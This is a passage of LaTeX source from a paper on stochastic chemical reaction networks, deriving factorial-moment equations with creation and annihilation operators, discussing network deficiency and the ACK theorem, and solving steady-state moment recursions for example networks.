\label{eq:a_adag_defs}
\end{align}
It follows that the operators obey the conventional commutation algebra
\begin{align}
\left[
a_p , a^{\dagger}_q
\right] =
{\delta}_{pq} ,
\label{eq:comm_relns}
\end{align}
where ${\delta}_{pq}$ is the Kronecker $\delta$.
Defining formal \textit{right-hand and left-hand null states},
\begin{align}
1
& \rightarrow
\left| 0 \right)
&
\int d^P \! z \,
{\delta}^P \! \left( z \right)
& \rightarrow
\left( 0 \right|
\label{eq:null_states}
\end{align}
(where ${\delta}^P \! \left( z \right)$ is the Dirac $\delta$ in $P$
dimensions, and the inner product of the null states is normalized:
$\left( 0 \mid 0 \right) = 1$),
for any vector ${\rm n} \equiv \left[ {\rm n}_p \right]$,
\begin{align}
&\prod_{p = 1}^P
{
a_p^{\dagger}
}^{{{\rm n}}_p}
\left| 0 \right) \equiv
\left| {\rm n} \right) .
\label{eq:number_states}
\end{align}
With these steps, the generating function $\phi$ becomes\footnote{
Note that though the generating function $\phi$ is explicitly
an analytic function of $z$, while the state $\left|\phi \right)$ is not,
the information they carry as a power series is exactly the same. Hence, for the purpose of generating moments, the fact that both are formal power series, of $z$ in one case and of $a^{\dagger}$ in the other, suffices without worrying about convergence properties \cite{Wilf:gen_fun:06}.}
\begin{align}
\phi \! \left( z \right) =
\sum_{{\rm n}}
\prod_{p = 1}^P
z_p^{{{\rm n}}_p}
{\rho}_{{\rm n}}
& \rightarrow
\sum_{{\rm n}}
{\rho}_{{\rm n}}
\left| {\rm n} \right) \equiv
\left| \phi \right) .
\label{eq:genfun_to_state}
\end{align}
The Liouville equation in this language
takes the form
\begin{align}
\frac{\partial \left| \phi \right) }{\partial \tau} =
- \mathcal{L} \!
\left( a_p , a_p^{\dagger}\right)
\left| \phi \right) .
\label{eq:Liouville_eq_multi_arg}
\end{align}
For example,
the Liouville operator $\mathcal{L}$ for the network
of Fig. \ref{fig:g_123_conn} (and Eq. \ref{eq:A_AA_AAA_R_scheme}) is
\begin{align}
\mathcal{L}
& =
\left( 1 - a^{\dagger} \right)
\left[
\alpha a^{\dagger} a -
\epsilon \left( 1 - a^{\dagger} \right)
a^{\dagger} a^2 -
\beta {a^{\dagger}}^2 a^3
\right]
\nonumber \\
& =
\left( 1 - a^{\dagger} \right)
\left( a^{\dagger} \! a \right)
\left[
\left(
\alpha -
\epsilon a
\right) +
\left( a^{\dagger} \! a - 1 \right)
\left(
\epsilon -
\beta a
\right)
\right] .
\label{eq:L_123_R}
\end{align}
The Liouville operator corresponding to the two-species network (Fig. \ref{fig:two_species_bistable}) is
\begin{align}
\mathcal{L}
& =
\left( 1 - a^{\dagger} \right)
\left[
\left(
\epsilon -
k_2 a
\right) +
\left( b^{\dagger} \! b \right)
\left( a^{\dagger} \! a \right)
\left(
k_1 -
{\bar{k}}_1 a
\right)
\right]
\nonumber \\
& \phantom{=}
\mbox{} +
\left( 1 - b^{\dagger} \right)
\left[
\left(
\epsilon -
k_2 b
\right) +
\left( a^{\dagger} \! a \right)
\left( b^{\dagger} \! b \right)
\left(
k_1 -
{\bar{k}}_1 b
\right)
\right] .
\label{eq:L_two_species_bistable}
\end{align}
where $\left( a^{\dagger} , a \right)$ and $\left( b^{\dagger} , b \right)$,
are creation and annihilation operators for the number components ${\rm n}_a$ and ${\rm n}_b$, respectively.
The Liouvillian may be written more compactly
in terms of the matrices $\cal{A}$ and $Y$.
To accomplish this, we need to introduce a little more notation.
Define a column vector,
\begin{align}
{\psi}_Y^i \! \left( a \right)
& \equiv
\prod_p
\left(a_p\right)^{y_{p,i}}
\label{eq:Psi_psi_i_def}
\end{align}
${\psi}_Y^{\dagger} \equiv {\left[ {{\psi}^{\dagger}}_Y^i \right]}^T$
is then a row vector of components defined on the indices $i$ \footnote{The index $i$ on the LHS indicates a component of the row vector and not a power.},
\begin{equation}
{{\psi}^{\dagger}}_Y^i \!
\left( a^{\dagger} \right) \equiv
\prod_p
\left({a^{\dagger}}_p\right)^{y_{p,i}}
\label{eq:psi_dag_i_def}
\end{equation}
For example, for the two-species network, these
are simply
\begin{align}
{\psi}^{\dagger}
& =
\left[
\begin{array}{cccccc}
1 & a^{\dagger} & b^{\dagger} &
a^{\dagger} b^{\dagger} &
{a^{\dagger}}^2 b^{\dagger} &
a^{\dagger} {b^{\dagger}}^2
\end{array}
\right]
\nonumber \\
{\left( \psi \right)}^T
& =
\left[
\begin{array}{cccccc}
1 & a & b & ab & a^2 b & ab^2
\end{array}
\right]
\label{eq:num_vecs_two_species_bistable}
\end{align}
In this formalism, the Liouville operator takes on the simple form,
\begin{align}
- \mathcal{L}
& =
{\psi}^{\dagger}_Y
{\cal A}
{\psi}_Y
\label{eq:L_psi_from_A}
\end{align}
\subsection {The Moment Hierarchy}
Entirely equivalent to solving the master equation or the Liouville equation, is to
solve the \textit{moment hierarchy}, namely to compute the time-dependent
values of \textit{all} the relevant moments in the problem.
The set of equations for all these moments, obtained directly
from the master equation or the Liouville equation,
is referred to as the moment hierarchy, because
usually lower-order moments couple to higher-order ones, resulting in an infinite
hierarchy of equations. Solving the moment hierarchy is hence by no means
a simple task and often involves making approximations. In what follows, we
demonstrate that for any mass-action CRN, the equations for
the \textit{factorial moments} (rather than the equations for ordinary moments) take on
a particularly tractable form. For the examples we consider, we show how this
tractability helps in solving the entire moment hierarchy in the steady state.
In order to see this, we first need to write down the
equations for the moments.
The time dependence of arbitrary moments is easily extracted from the
Liouville equation via the Glauber inner product,
which is a standard construction \cite{Cardy:FTNeqSM:99,Mattis:RDQFT:98}.
In the interest of completeness, we provide all relevant details in what follows.
As mentioned earlier, we will prefer instead to look
at the {\it factorial} moments (FM). In order to define these,
consider, for a single component ${{\rm n}}_p$ and power $k_p$, the quantity
\begin{align}
{{\rm n}}_p^{\underline{k_p}}
& \equiv
\frac{
{{\rm n}}_p !
}{
\left( {{\rm n}}_p - k_p \right) !
}
& ; \; k_p \le {{\rm n}}_p
\nonumber \\
& \equiv
0
& ; \; k_p > {{\rm n}}_p .
\label{eq:factorial_moment_not}
\end{align}
For a vector $k \equiv \left[ k_p \right]$ of powers and a vector ${\rm n}$ of
instanstaneous numbers of the species, we
introduce the \textit{factorial moment} indexed by $k$, as
the expectation
\begin{equation}
\left<
{\rm n}^{\underline k}
\right> \equiv
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right> .
\label{eq:Phi_def}
\end{equation}
The FM are generated by the action of the lowering operator on the number state.
In particular, for any non-negative integer $k_p$,
\begin{align}
a_p^{k_p}
\left| {\rm n} \right)
& =
{{\rm n}}_p^{\underline{k_p}}
\left| {\rm n} - k_p \right)
\nonumber \\
{a^{\dagger}_p}^{k_p} a_p^{k_p}
\left| {\rm n} \right)
& =
{{\rm n}}_p^{\underline{k}}
\left| {\rm n} \right) .
\label{eq:trunc_fact_extract}
\end{align}
where $\left| {\rm n} - k_p \right)$ is the number state with $k_p$
subtracted from ${{\rm n}}_p$ and all ${{\rm n}}_q$ for $q \neq p$ unchanged.
The time dependence of the FM is then simply given by
\begin{align}
\frac{\partial}{\partial \tau}
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right> \equiv \frac{\partial}{\partial \tau}
\left<
{\rm n}^{\underline k}
\right>
& =
\left( 0 \right|
e^{\sum_q a_q}
{
\prod_p \left(a_p \right)
}^{k_p}
\left( - \mathcal{L} \right)
\left| \phi \right)
\nonumber \\
& =
\left( 0 \right|
e^{\sum_q a_q}
{ \prod_p \left(a_p \right)
}^{k_p}
{\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)
{\cal A} \,
{\psi}_Y \! \left( a \right)
\left| \phi \right)
\label{eq:fac_mom}
\end{align}
In writing Eq. (\ref{eq:fac_mom}), the fact that
all number states are normalized with respect to the \textit{Glauber
inner product}, defined by
\begin{align}
\left( 0 \right|
e^{\sum_p a_p}
\left| {\rm n} \right) = 1 , \quad
\forall {\rm n}
\label{eq:Glauber_inn_prod}
\end{align}
is used.
The Glauber inner product with a generating function is simply the
trace of the underlying probability density:
\begin{align}
\left( 0 \right|
e^{\sum_p a_p}
\left| \phi \right) =
\sum_{{\rm n}}
{\rho}_{{\rm n}} = 1 .
\label{eq:Glauber_is_trace}
\end{align}
Eq. (\ref{eq:fac_mom}) denotes the time-evolution of a generic
FM for a CRN with an arbitrary number of species.
In particular, the equation for the first moment
takes on a simple form. Note that a
first moment, for a CRN of $P$ species, is
specified by a vector $k \equiv \left[ k_p \right]$,
with only one of the $k_p$'s being non-zero (and having the value $1$). This corresponds
to computing the average value of the number of one specific species $p$.
In this case, from Eq. (\ref{eq:fac_mom}), we need
only to commute $a_p$ through $ {\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)$ \footnote{The general closed form expression for the commutation of $a_p^{k_p}$ through any power of $a^{\dagger}$ is given in Eq. (\ref{eq:comm_rules}).} to obtain,
\begin{align}
\frac{\partial}{\partial \tau} \left< {\rm n_p} \right> &=
Y_p {\cal A} \,
\left( 0 \right|
e^{\sum_q a_q} {\psi}_Y \! \left( a \right) \left| \phi \right)
\label{eq:CRN_std_rate_eqn}
\end{align}
In what follows, we refer to the inner product in
Eq.~(\ref{eq:CRN_std_rate_eqn})
as $E\left[{\psi}_Y \! \left( a \right) \right]$ to simplify notation.
Note that, using the above definitions, $E\left[a_p^{k_p}\right] \equiv \langle n_p^{\underline {k_p}} \rangle$: the FM of order $k_p$.
\subsection{Deficiency}
It is useful at this stage to
understand the relations between the dimensions of the
matrix ${\cal A}$ and the matrix $Y{\cal A}$ (or the row vector $Y_p{\cal A}$).
The reason for considering these is that, as we see from Eq.~(\ref{eq:CRN_std_rate_eqn}), all steady states must lie in $ \ker\left( Y{\cal A} \right)$ (since
the steady state condition implies that the
LHS of Eq.~(\ref{eq:CRN_std_rate_eqn}) must vanish).
This can happen either because the steady state lies in $\ker {\cal A}$
(and so vanishes directly by the action of ${\cal A}$) or because
the steady state \textit{does not} lie in $\ker {\cal A}$
but nevertheless lies in $\ker\left(Y {\cal A} \right)$. The difference between
these two situations, as we will see, summarises the difference between
$\delta=0$ and $\delta \neq 0$- networks.
By definition, since the number of columns (and rows) in the
matrix ${\cal A}$ is equal to the number of complexes ${\mathcal{C}}$, matrix
${\cal A}$ has dimension $ {\mathcal{C}} $. Then from elementary considerations,
\begin{align}
\dim \left({\cal A} \right) &=
\dim \left( \Ima \left( {\cal A} \right) \right) +
\dim \left( \ker \left( {\cal A} \right) \right) \nonumber \\
& =
\dim \left( \Ima \left( Y {\cal A} \right) \right) +
\dim
\left(
\ker Y \cap \Ima \left( {\cal A} \right)
\right) \nonumber + l \\
& \equiv
s + \delta + l.
\label{eq:A_ident}
\end{align}
Here $ \dim \left( \ker \left( {\cal A} \right) \right) \equiv l$
where $l$ is the number of linkage classes \footnote{A linkage class is a connected component of the directed graph representing the CRN; $l=1$ for the CRN described by Eq. (\ref{eq:A_AA_AAA_R_scheme}) and $l=2$ for the CRN described by Eq. (\ref{eq:cubic_2spec_scheme})}. In Eq. (\ref{eq:A_ident}), the $ \dim \left( \Ima \left( {\cal A} \right) \right) $ is further split into those vectors
that either lie \textit{both} in the $\Ima ({\cal A})$ and $ \ker \left( Y \right)$ or lie in the $\Ima \left( Y {\cal A} \right)$.
Eq. (\ref{eq:A_ident})
provides a definition for the parameter $s$ and deficiency $\delta={\mathcal{C}} - s - l$ \cite{Feinberg:def_01:87}.
For the CRN in Fig. ~\ref{fig:g_123_conn}, $\mathcal{C}=3,l=1,s=1$ giving $\delta =1$.
For the CRN in Fig. ~\ref{fig:two_species_bistable}, $\mathcal{C}=6,l=2,s=2$ giving $\delta =2$.
For $\delta =0$ networks, all steady states
lie simultaneously in $\ker \left({\cal A} \right)$ and in $\ker \left( Y {\cal A} \right)$ and are termed \textit{complex-balanced}.
If $\delta > 0$, this is no longer true.
In what follows, we derive some new
results for CRN's in this category.
From the above discussion, it follows that
we can define basis vectors
${\left\{ e_i \right\}}_{i = 1}^s$ for ${\ker \left(Y{\mathcal{A}} \right)}^{\perp}$, the space of vectors perpendicular to those lying in $\ker \left( Y {\cal A} \right)$.
Let also ${\left\{ {\tilde{e}}_j \right\}}_{j = 1}^{\delta}$ be a
basis for $\ker \left( Y{\mathcal{A}} \right) / \ker \left({\mathcal{A}} \right)$, the space of vectors lying in $\ker \left( Y {\cal A} \right)$ but {\em not} in $\ker \left( {\cal A} \right)$.
It follows that jointly $\left\{ {\left\{ e_i \right\}}_{i =
1}^s, {\left\{ {\tilde{e}}_j \right\}}_{j = 1}^{\delta} \right\}$ form
a basis for ${\ker \left( {\mathcal{A}} \right)}^{\perp}$.
Then from Eq.~(\ref{eq:L_psi_from_A}),
\begin{align}
- \mathcal{L}
& =
{\psi}^{\dagger}_Y
{\mathcal{A}}
\left\{
\sum_{i = 1}^s
e_i e_i^T +
\sum_{j = 1}^{\delta}
{\tilde{e}}_j {\tilde{e}}_j^T
\right\}
{\psi}_Y
\label{eq:Ls_reps}
\end{align}
That the second sum does not play a role for $\delta =0$ networks,
has implications for the steady state, as we will see in Section II F.
It is easy to explicitly work out these basis vectors for specific
examples (such as the networks of Fig. \ref{fig:g_123_conn}
and Fig. \ref{fig:two_species_bistable}) \cite{Smith:LP_CRN:17}.
\subsection{Equation for the Factorial Moments}
Eq. (\ref{eq:fac_mom}) is valid for a generic FM, but may be simplified
further by writing the RHS in terms of the matrices $Y$ and ${\cal A}$,
in correspondence to the equation for the first moment Eq. (\ref{eq:CRN_std_rate_eqn}).
In order to see this, we need to understand what terms
we get when we commute $a_p^{k_p}$ through $ {\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)$
which contains terms like ${a_p^{\dagger y}}$.
For non-negative integers $k_p$ and $y$, we can use the relation
\begin{align}
{\left( a_p^{k_p} {a_p^{\dagger y}} \right)}
& = \sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
{k_p} \\ j
\end{array}
\right)
{
{y}^{\underline j} {a_p^{\dagger}}^{y-j} a_p^{k_p-j}
}
\label{eq:comm_rules}
\end{align}
where $y^{\underline 0}=1$. For $j \neq 0$,
${y}^ {\underline j} = (y)(y-1) \cdots (y-j+1)$ for $j-1 \leq y$
and ${y}^{\underline j} =0$ otherwise. It is now easily seen that,
\begin{align}
\left( 0 \right|
e^a
{
\left( a_p \right)
}^{k_p}
{{\psi}^{\dagger}}_Y^i \! \left( a^{\dagger} \right)
=
\left( 0 \right|
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_{p} \right)
}^{\underline j}
e^a
{
\left(
a_p
\right)
}^{k_p - j}
\label{eq:np_psii_comm_exp}
\end{align}
where $\left( Y_{p} \right)^{\underline j} $ is the matrix $Y$ with
the elements in the $p^{th}$ row modified to $y_{p,i}^{\underline j}$.
$\psi \left( a^{\dagger} =1 \right) = {1}$, because $
\left( 0 \right| e^a a^{\dagger y} = \left( 0 \right| {\left( 1+
a^{\dagger} \right) }^y e^a = \left( 0 \right|e^a $.
The equation for the time-dependence of ${\rm n}_p^{\underline {k_p}}$
may hence be compactly written as
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{\rm n}_p^{\underline {k_p}}
\right>
& =
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_p \right)
}^{\underline j} {\cal A}
E\left[ a_p^{k_p-j} {\psi}_{Y} \! \left( a \right)\right]
\label{eq:fac_mom1}
\end{align}
Note that in Eq. (\ref{eq:fac_mom1}),
$\underline{j}=0$ does not contribute since this multiplies $\cal{A}$
by a row vector of $1$'s, which is a zero left eigenvector.
Hence for $k_p=1$, only the $j=1$ term contributes. This
gives $\left( Y_{p} \right)^{\underline 1} = Y_p $, resulting
in the RHS of Eq. (\ref{eq:CRN_std_rate_eqn}).
Eq.(\ref{eq:fac_mom1}) may also be easily generalized in order to calculate mixed moments as in Eq. (\ref{eq:Phi_def}). For this
we need to consider the action of the lowering operators
$\prod_p a_p^{k_p}$ (as in Eq. \ref{eq:fac_mom}) which, by their action on
$\left| \phi \right) $
result in mixed moments $\left< \prod_p {{\rm n}}_p^{\underline{k_p}} \right>$.
By considering the generalisation of Eq. (\ref{eq:comm_rules}),
the equation for the time derivative of such a mixed moment is seen to be,
\begin{align}
\frac{\partial}{\partial \tau}
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right>
& =
\sum_{j_1 = 0}^{k_1}
\left(
\begin{array}{c}
k_1 \\ j_1
\end{array}
\right) \ldots
\sum_{j_P = 0}^{k_P}
\left(
\begin{array}{c}
k_P \\ j_P
\end{array}
\right)
\left[
\dot{\prod_p}
Y_p^{\underline{j_p}} \,
\right]
{\cal A}
E \left[
{\Psi}_{Y + \left( k - j \right)} \! \left( {\rm n} \right)
\right]
\nonumber \\
\label{eq:Glauber_moment_fact_prod}
\end{align}
The notation ${\dot{\prod}}_p$ denotes a product over species $p$
within each index $i$ of the row vectors $Y_p^{\underline{j_p}}$.
Note that in the sums over $j_p$, we must now retain the $j_p = 0$
entries, because even if one index $Y_p^{\underline{j_p}} = {\left[ 1
\right]}^T$, there may be others in the sum where $j_{p^{\prime}} \neq
0$, and the product $\left( {\dot{\prod}}_p Y_p^{\underline{j_p}}
\right) {\cal A} $ is only assured to vanish when all $j_p = 0$.
The term $ E \left[ {\psi}_{Y + \left( k - j \right)} \! \left( {\rm n} \right)\right]$
is a shorthand notation for
$ E\left[\prod_p a_p^{k_p-j_p} {\psi}_{Y} \! \left( a \right)\right]$.
Note that though Eq. (\ref{eq:fac_mom1}) and Eq. (\ref{eq:Glauber_moment_fact_prod}) may be derived directly
from the master equation (without going through the Doi algebra),
the simplification that comes from noting the relation of
the coefficients to the matrices $Y$ and ${\cal A}$
is only possible within the formalism we introduce here.
This in turn helps in writing and solving
recursion relations to solve the entire moment hierarchy as we demonstrate
in Section II G.
\subsection{A one-line proof of the ACK theorem}
We explain how the ACK theorem follows very simply from
the considerations above. Without loss of generality we
limit this discussion to Eq. (\ref{eq:fac_mom1}), for
ease of presentation.
From the considerations in Section II D,
Eq. (\ref{eq:fac_mom1}) may be re-written as,
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{\rm n}_p^{\underline k_p}
\right>
& =
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_p \right)
}^{\underline j} {\mathcal{A}}
\left\{
\sum_{i = 1}^s
e_i e_i^T +
\sum_{j = 1}^{\delta}
{\tilde{e}}_j {\tilde{e}}_j^T
\right\}
\nonumber \\
& \mbox{}
\times E \left[ a_p^{k_p-j} {\psi}_{Y} \! \left( a \right) \right]
\label{eq:fac_mom3}
\end{align}
In particular, the equation for the first moment
Eq. (\ref{eq:CRN_std_rate_eqn}), can be written as
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{{\rm n}_p}
\right>
& =
{
Y_p {\cal A}
\sum_{i = 1}^s
e_i e_i^T
E \left[ {\psi}_{Y} \! \left(a\right) \right]}
\label{eq:fac_mom4}
\end{align}
where we have used the fact that all other basis
vectors are projected to zero by $Y_p {\cal A}$.
Hence for $\delta=0$ networks with mass-action
rates,
the entire hierarchy of moments, Eq. (\ref{eq:fac_mom3}) for any value of $k_p$,
is satisfied
if
\begin{equation}
e_i^T E \left[\left[{\psi}_{Y} \! \left( a \right)\right]\right] =0
\label{eq:projectors_cond}
\end{equation}
for every $i=1,\cdots s$. The notation $E\left[\left[ \,\,
\right]\right]$ denotes
now an average over a specific distribution: a Poisson distribution.
Note that for a Poisson distribution,
an equation for the first moment is the same as a {\it rate equation}
(since $\langle {\rm n}^{\underline k} \rangle = \langle {\rm n} \rangle ^k$).
Hence, for $\delta =0$ networks,
the condition that the rate equation has a unique solution
also guarantees that the entire moment hierarchy is solved,
whereby follows the ACK theorem \cite{Anderson:product_dist:10}.
\subsection{Steady-state Recursions}
For CRN's for which $\delta \neq 0$, there is no general way
to satisfy the full moment-hierarchy
of Eq. (\ref{eq:Glauber_moment_fact_prod}) by demanding that any combination of
$e$ and $\tilde{e}$ vanish.
Note though that the sums $\sum_j$ in Eq. (\ref{eq:Glauber_moment_fact_prod}),
only extend from $j=0$ to $j=j_{\rm max}$ with
the latter determined by when row
$Y_p^{\underline j_{\rm max}}$ vanishes. For the CRN in
Fig. \ref{fig:g_123_conn}, $j_{\rm max} =4$,
while for the CRN in Fig. \ref{fig:two_species_bistable}, there are two sums over $j$
in Eq. (\ref{eq:Glauber_moment_fact_prod}), both with $j_{\rm max} =3$.
This helps us write Eq. (\ref{eq:fac_mom1}) (or Eq. (\ref{eq:Glauber_moment_fact_prod}) in the general case), as a recursion relation
for the ratios of FM's in the steady state.
We demonstrate this for the two examples introduced above. For the CRN of Fig. \ref{fig:g_123_conn}
if we define $ R_k \equiv \frac{\left<{{\rm n}}^{\underline k}\right>}{\left<{{\rm n}}^{\underline {k-1}}\right>} $\footnote{for one species $k=k_p$},
then Eq. (\ref{eq:fac_mom1}) may be rewritten {\it exactly} as the
following recursion relation for $k>1$\footnote{The moment recursions for this CRN leave $k=1$ undertermined. However this does {\em not} mean that $R_1$ is free to take any value. Moments of a probability distribution satisfy inequalities \cite{vanKampen:Stoch_Proc:07} such as the elementary relation $R_2 \geq (R_1-1)$. These presumably constrain the first moment to its actual value.},
\begin{equation}
R_k= \frac{(k-1)\left(\frac{\alpha}{\beta}+ \frac{\epsilon}{\beta}(k-2)\right)} {(k-1) \left(2 R_{k+1} + (k-2) -\frac{\epsilon}{\beta}\right) + R_{k+2}R_{k+1} - \frac{\alpha}{\beta} }
\label{eq:rec_123}
\end{equation}
We have written the recursion for $R_k$ for descending $k$ because,
while we do not know the value of $R_k$ for
small $k$, we do know it for large $k$, where $R_k \sim \epsilon/\beta$
(as evident from Eq. \ref{eq:rec_123}).
If we begin from this `asymptotic' value
at arbitrarily large $k$, we have a procedure to
obtain the value of $R_k$ all the way down to $k=2$, for any choice of
parameters \footnote{We often want to obtain the actual moments
and not just their ratios. Note that this is possible
since $R_1 \equiv \left<n\right>$. Hence, $\langle n^{\underline{2}} \rangle = R_2R_1$; $\langle n^{\underline{3}} \rangle = R_3R_2R_1$ {\em etc}.}
The result is shown in Fig. \ref{fig:rec_123_comp}. Eq. (\ref{eq:rec_123}) being
\textit{exact }, the results of the recursions and the Monte-Carlo simulations
agree to arbitrary accuracy, limited only by the amount of averaging done in the simulations (and we expect this to be the case for
any set of parameters)\footnote{The downward recursion Eq. (\ref{eq:rec_123})
may however not converge below $k$-values much smaller than $\left<n\right>$ for parameter values which make the latter large. In this case,
an \textit{upward} recursion, for larger $k$ in terms of smaller $k$ can be written and both
upward and downward recursions solved simultaneously. In \cite{Smith:LP_CRN:17}, we elaborate on this further.}.
\begin{figure}
\begin{center}
\includegraphics[scale=0.2,angle=270]{rec_123_comp.eps}
\caption{Numerical evaluation of the recursions of Eq. \ref{eq:rec_123} (line) compared to values from Monte-Carlo simulations (symbols) for $\alpha=100$, $\beta=10$ and $\epsilon =70$. For large $k$, $R_k$ saturates to $\epsilon/\beta = 7$ as explained in the text.
\label{fig:rec_123_comp}
}
\end{center}
\end{figure}
The one-species case we have considered is an example of a birth-death process
\cite{vanKampen:Stoch_Proc:07} for which many results are known, including the steady state. The recursions Eq. (\ref{eq:rec_123}) however, give us a particularly
easy way, albeit numerical, to obtain this steady state.
In addition, while there exists no general formalism to obtain the steady state for CRN's which are {\em not} birth-death processes, the above procedure is, in principle, applicable to any CRN, such as the two-species CRN of Fig. \ref{fig:two_species_bistable}, as we show below.
The moment hierarchy for the two-species case
consists of mixed moments such as
$ \langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k^{\prime}} \rangle$.
This CRN has no conservation
law, so solving the full moment hierarchy is equivalent to solving for the full probability distribtion $P\! \left({\rm n}_a,{\rm n}_b \right)$ which is, in addition, {\em not} factorized. In analogy with the one-species case,
we can write a coupled
set of recursions for the quantities $T_k \equiv \frac{ \langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k} \rangle}{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle}$ and $S_k \equiv \frac{\langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline{k-1}}\rangle }{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle}$. For large $k$, the equations for the FM predict that $T_k \sim \left(k_1/{\bar k}_1\right)^2$ and $S_k \sim \left(k_1/{\bar k}_1\right) $.
Using the symmetries of this CRN (in the exchangeability of the
species $\rm A$ and $\rm B$; hence $\langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k^{\prime}} \rangle = \langle {\rm n}_a^{\underline k^{\prime}}{\rm n}_b^{\underline k} \rangle$), and approximating $\frac{\langle {\rm n}_a^{\underline {k-2}}{\rm n}_b^{\underline{k}}\rangle }{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle} \sim 1$\footnote{We have verified this numerically. A
theoretical justification comes from looking at the analytic form of the FM in the large-$k,k^{\prime}$ limit \cite{Smith:LP_CRN:17}. We can show that to leading order the FM are only functions of $k+k^{\prime}$ thus validating this approximation.},
we obtain two coupled recursions,
\begin{align}
T_k &= \frac{2\epsilon k -\epsilon + k k_1(k-1)(2k-3)}{S_{k+1}C + T_{k+1}D + E} \nonumber \\
S_k &= T_k\left({S_{k+1}C_1 + T_{k+1}D_1 + E_1} \right)
\label{eq:rec_two_species}
\end{align}
where $C$, $D$ {\em etc} are functions of $k$ as well as the rate constants
$k_1$, ${\bar{k}_1}$ {\em etc} in the problem. Again, for large $k$, it is easy to see from the recursions (after putting in the expressions for $C$, $D$ {\em etc}), that $T_k \sim \left( \frac{k_1}{\bar{k}_1} \right)^2$ and $S_k \sim \frac{k_1}{\bar{k}_1}$ as required by the equations for the FM. Beginning from this value at some
arbitrarily large value of $k$, we can predict values for $T_k$ all the
way down to $k=2$ as shown in Fig. \ref{fig:rec_two_species}.
\begin{figure}
\begin{center}
\includegraphics[scale=0.2,angle=270]{new_para_1.eps}
\caption{Numerical evaluation of the recursions of Eq. \ref{eq:rec_two_species} (line) compared to values from Monte-Carlo simulations (symbols) for $k_1=14$, $\bar{k}_1=1$,$\epsilon =36$ and $k_2=49$. For large $k$, $T_k$ saturates to $\left(k_1/{\bar k}_1\right)^2 = 196$. {The values obtained from the recursions and simulations agree upto the first decimal place for any $k$.}
\label{fig:rec_two_species}
}
\end{center}
\end{figure}
Note that $R_k$ saturating to a constant value independent of $k$ in the one-species case is as if the large-$k$ moments obey a Poisson distribution
with parameter $ \epsilon/\beta$ \footnote{$R_k$ could also be a constant
if the distribution was a delta function around $\epsilon/\beta$.
This can however not happen when fluctuations in the number are possible.}.
Similarly $T_k$ and $S_k$ saturating to constant values is equivalent to
the large-$k$ behaviour of the two-species system being describable
by a factorised Poisson distribution with parameter $\left(k_1/{\bar k}_1\right)$. From the form of Eq. (\ref{eq:fac_mom1}) in the steady state,
it is evident that, even with an arbitrary number of species,
there will always be a limited number of terms which will dominate
for large moments. Demanding that these terms vanish will hence always lead
to a factorized Poisson distribution which will approximately (up to corrections
of order $1/k$) solve the moment hierarchy.
On the other side, at $k=1$, the equation for the
first moment can also be solved by postulating a factorized Poisson distribution
with the parameter of the Poisson determined by the rate equation of the problem.
These two Poisson distributions have different parameters and are both,
for a $\delta \neq 0$- network, only approximations for the true distribution.
Nevertheless, they are helpful in implementing a systematic
approximation procedure to solve the moment hierarchy as we elaborate in a
following paper \cite{Smith:LP_CRN:17}.
\subsection{Quasi Steady States}
The CRN's we have considered so far have been {\em reversible}
in the sense that every reaction is accompanied by its reverse.
We now consider a CRN which is neither reversible nor even weakly reversible:
\begin{align}
& {\rm B} \xrightarrow {\beta} {\rm A} \nonumber \\
& {\rm B} + {\rm A}
\xrightarrow {\alpha} {2 \rm B} .
\label{eq:quasist}
\end{align}
This CRN has been considered in \cite{Anderson:ACR:14} in the context of
understanding properties of the quasi-stationary distribution. The
true steady state of this model is an absorbing state with ${\rm n}_b=0$.
However when ${\rm n}_a+ {\rm n}_b =\rm M$, and $\rm M$ is large, the
system could take a very long time to reach this absorbing state,
and reach instead a quasi-stationary distribution.
All properties of the quasi-stationary distribution are easily
derivable for this model \cite {Anderson:ACR:14} and it
is seen that as $\rm M \rightarrow \infty$, this
distribution is a Poisson with parameter
$\beta/\alpha$ \cite {Anderson:ACR:14}.
The equations for the FM, give this result very easily as well.
If we define $ X_k \equiv \frac{\left<{{\rm n}_a}^{\underline k}{{\rm n}_b}^{\underline {k^{\prime}-1}}\right>}{\left<{{\rm n}_a}^{\underline {k-1}} {{\rm n}_b}^{\underline {k^{\prime}-1}}\right>}$, then it is easily seen that the CRN of Eq. (\ref{eq:quasist}) leads to the
recursions
\begin{equation}
X_k = \frac{k\beta {\rm M}^2}{k\alpha {\rm M}^2 + A + X_{k+1}B + X_{k+1}X_{k+2} \alpha (k+k^{\prime})}
\end{equation}
$A$ and $B$ are linear in $\rm M$, and hence for large $\rm M$ and $k^{\prime}=1$, $X_k \sim \frac{\beta}{\alpha}$ for any $k$, as expected for the ratios of the
FM of a Poisson distribution \footnote{Note that $X_k=\rm M$ is also a solution for $k^{\prime}=1$. This is the absorbing state.}.
\section{Conclusion}
To conclude, the structure of the equations for the FM
help us write them as recursions for ratios of FM, which
then can be solved numerically,
beginning from an asymptotic estimate (predicted by the equations themselves).
The equations for the FM (Eq. \ref{eq:fac_mom1} or Eq. \ref{eq:Glauber_moment_fact_prod}) are exact and given any CRN, are easy to write down.
In this paper, we have illustrated this procedure for two
toy models. However, there are several physically
relevant model-CRN's in the biochemistry, systems-biology, ecology
and epidemiology contexts,
to which we expect to be able to apply our methods.
It should be noted however, that
except in the case of very few species, or very simple stoichiometry,
the recursions obtained from these equations could
